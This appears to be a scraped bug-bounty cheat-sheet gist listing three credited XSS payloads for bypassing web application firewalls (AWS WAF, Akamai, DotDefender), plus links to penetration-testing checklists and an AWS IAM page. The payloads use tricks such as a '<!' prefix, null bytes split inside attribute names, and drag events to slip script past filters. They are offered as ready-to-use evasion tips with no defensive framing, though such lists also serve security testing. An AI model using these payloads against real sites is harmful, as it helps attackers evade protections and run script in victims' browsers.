http://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html https://www.youtube.com/watch?v=_wiGpBQGCjU
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@vanshitmalhotra | Bypass AWS WAF -// | |
Add "<!" (without quotes) before your payload and bypass that WAF. :) | |
eg: <!<script>confirm(1)</script> | |
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc | |
<img sr%00c=x o%00nerror=((pro%00mpt(1)))> | |
DotDefender WAF bypass by @0xInfection | |
<bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme |
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf